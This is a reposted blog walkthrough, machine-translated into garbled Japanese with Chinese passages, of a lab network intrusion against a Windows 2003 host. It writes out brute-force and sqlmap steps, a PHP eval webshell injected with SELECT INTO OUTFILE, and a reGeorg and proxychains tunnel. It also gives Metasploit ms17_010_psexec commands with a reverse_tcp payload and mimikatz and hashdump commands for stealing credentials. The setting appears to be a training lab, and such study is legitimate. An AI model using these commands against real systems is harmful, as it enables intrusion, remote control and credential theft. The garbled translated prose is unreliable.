詳細なネットワーク侵入プロセス

その他 2019-06-03 16:34:45 訪問数: null

詳細なネットワーク侵入プロセス

序文

ターゲット：指定されたターゲットのIPを、サーバに許可を与える、とにより、IP 制御ネットワークのネットワーク内の両方のサーバーに浸透

攻撃：カーリー（192.168.31.51）

ターゲット： Windows 2003の（192.168.31.196）

1. ブルートフォース

フォアグラウンドでは、「ログイン」ユーザーのアカウントを見つけます

使用 burpsuite 弱いパスワードパスワードを爆破

成功した着陸のユーザーインターフェース

2.SQLの注入

ホームが見つかりましたSQL インジェクションのポイントを

使用 SQLMAP 管理者アカウントとパスワードを得るためのツールを

3. 越権は、超チューブのウェブサイトの背景を追加します

入力 kefu 共通管理者権限であることが判明し、管理者の背景を、多くの操作が制限されました

パケットをキャプチャすることにより、権限、変更することが分かっ「submanage 」に変更「の管理を、その後、袋を入れ、」

成功「一般管理者」権限「スーパー管理者」を変更して、権利または「のキャッチ発見「パッケージ」を取得するsubmanageを」、「と修正していき管理」

修改成功，【在这个网站中，普通管理员想要操作不受限制，没次操作都可抓包修改为“manage”，所以在这里我利用此漏洞直接添加一个超管，便于操作】

成功登陆我刚新建的超管“let”

4.getshell

通过ip访问此网站，发现该网站存在“探针”，可以查看到当前网站目录

通过sql注入出的管理员账户密码，登陆“data”管理员后台，发现此管理员有执行sql语句的权限，利用数据库命令，将“php一句话”写入到网站根目录下

例如：select "<?php eval($_POST['pass']);?>" into outfile "C:/UPUPW_AP5.2/htdocs/wlt.php"

成功用“菜刀”连接网站后台

5.添加系统账户【超管】

上传一个“php大马”

利用“大马”执行命令，创建系统超管账户

扫描发现3389端口开启，远程连接到系统

6.隧道代理-端口转发

开启reGeorg监听：python reGeorgSocksProxy.py -p 9527 -u http://192.168.31.196/tunnel.php

使用proxychains工具

设置代理，先vi /etc/proxychains.conf编辑，再将第二行命令运行【复制相关文件，需要调用】，最后添加firefox和nmap等用到的工具

取消图中的注释

添加通道5，代理监听的端口，例如9527

使用nmap工具查询开放的端口

通过用户想要使用的应用程序运行ProxyChains，例如，启动msfconsole

执行命令：proxychains msfconsole

如下图所示，输入命令执行脚本便可连接到目标主机

【1】set payload windows/x64/meterpreter/reverse_tcp

或者set payload windows/meterpreter/reverse_tcp //针对目标机器使用的系统版本，目标机器32位就使用32位

【2】set LHOST 本机IP

【3】use exploit/windows/smb/ms17_010_psexec【脚本】

【4】set RHOST 目标IP

【5】run

如下图所示，表示成功连接到了目标主机，可输入相应的命令来达到目的

代理获取系统账户和密码

获取加密密码

例如输入命令：run post/windows/gather/smart_hashdump，可以获取目标主机的账户和密码

获取明文密码

利用mimikatz获取明文密码，命令如下【我只用了两条命令】：

meterpreter > load mimikatz #加载mimikatz

meterpreter > msv #获取hash值

meterpreter > kerberos #获取明文

meterpreter >ssp #获取明文信息

meterpreter > wdigest #获取系统账户信息

meterpreter >mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示

meterpreter >mimikatz_command -f hash:: #获取目标 hash

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

开启3389端口

用run getgui -e命令开启3389端口

远程连接

使用远程连接，连接目标主机：proxychains rdesktop 192.168.238.129和proxychains rdesktop 192.168.238.130

おすすめ

転載: www.cnblogs.com/guaishoujingling/p/10966865.html

詳細なネットワーク侵入プロセス

Android 13 ネットワーク Adb 関連プロセスに関する詳細な分析と研究

侵入テストプロセスとネットワーク攻撃

入力 URL からページ表示プロセスまで: ネットワークリクエストとレンダリングの詳細な分析

Tencent Cloud SA3 サーバー AMD プロセッサー CPU ネットワーク帯域幅パフォーマンスの詳細な説明

DC-2 ターゲットマシン侵入の詳細なプロセス (付属のターゲットマシンリンク)

Vulnhub ターゲットマシン: DC-2 侵入の詳細なプロセス

ネットワークサービス--SAMBAの概要と詳細なプロフィール

Pytorch はニューラルネットワークを実装します (コードによる詳細なプロセス)

侵入テスト---ネットワークプロトコルセキュリティ

完全な OkHttp3 ネットワークリクエストプロセスに関連する、プロセス指向のやや詳細なソースコードと原理分析

ネットワークセキュリティと侵入-システムユーザーパスワードのブルートフォースクラッキング|ネットワークポートスキャン|超詳細

詳細な NAT (ネットワークアドレス変換)

Redis の詳細な調査 - マスター/スレーブ構造の構成、プロセス、および基礎となる原理 (ネットワーク全体で最も詳細)

スーパーシンプルなネットワーク侵入ngrok

PCL 制約付きドローネ三角測量ネットワーク (C++ 詳細プロセス版)

コンピュータネットワークノート-4（TCPプロトコルの詳細な説明）

[ネットワークセキュリティ --- ツールのインストール] VMware 16.0 の詳細なインストールプロセス (提供されているリソース)

ネットワークセキュリティレベルプロテクション2.0の詳細説明

ネットワーク、プロセス、スクリプト

RSTの詳細なソケットネットワークプログラミング

MPLS仮想プライベートネットワークの3つのクロスドメインメソッドの詳細な説明

ネットワーク必須 - 動的ルーティングプロトコルOSPF（超詳細な理論）

トランスポート層プロトコルの詳細（キー4、白ネットワーク必要な知識）

詳細なDockerネットワークリソース---（4つのネットワークモード）

クラウドサーバーをレンタルする必要はありません。Linux を使用して Web サービスをローカルに構築し、イントラネットの侵入とパブリックネットワークアクセスに関する詳細なチュートリアルを実装します。

FPGA GTP ネットワーク、aurora 8b/10b プロトコル、HDMI ビデオ伝送の最も詳細な説明、4 セットのエンジニアリングソースコードと技術サポートを提供

2023 ネットワークセキュリティコンペティション - Web ページ侵入テストの二次専門グループ (超詳細)

詳細高度なネットワークフローアルゴリズム

詳細なプロセスフレームワークDjangoの休息

おすすめ

ランキング

Oracleのクエリ重複フィールド

An error occurred when ssm used count to query data

【Leyes de la Naturaleza】La sabiduría de las multitudes

JavaWebの研究では、（13）を締結 - セッションの使用は、重複送信フォームを防ぎます

Firebase増加サインアップクォータ

[MyBatisフレームワーク]mybatis入門

ハートレスの世界

Djangoのインストールと使用について

[转] UiPath展開アーキテクチャ

mybatis-plusは楽観的なロック変更を使用します

アーカイブ

もっと

2024-05-14(9)

2024-05-13(8)

2024-05-12(27)

2024-05-11(31)

2024-05-10(33)

2024-05-09(30)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)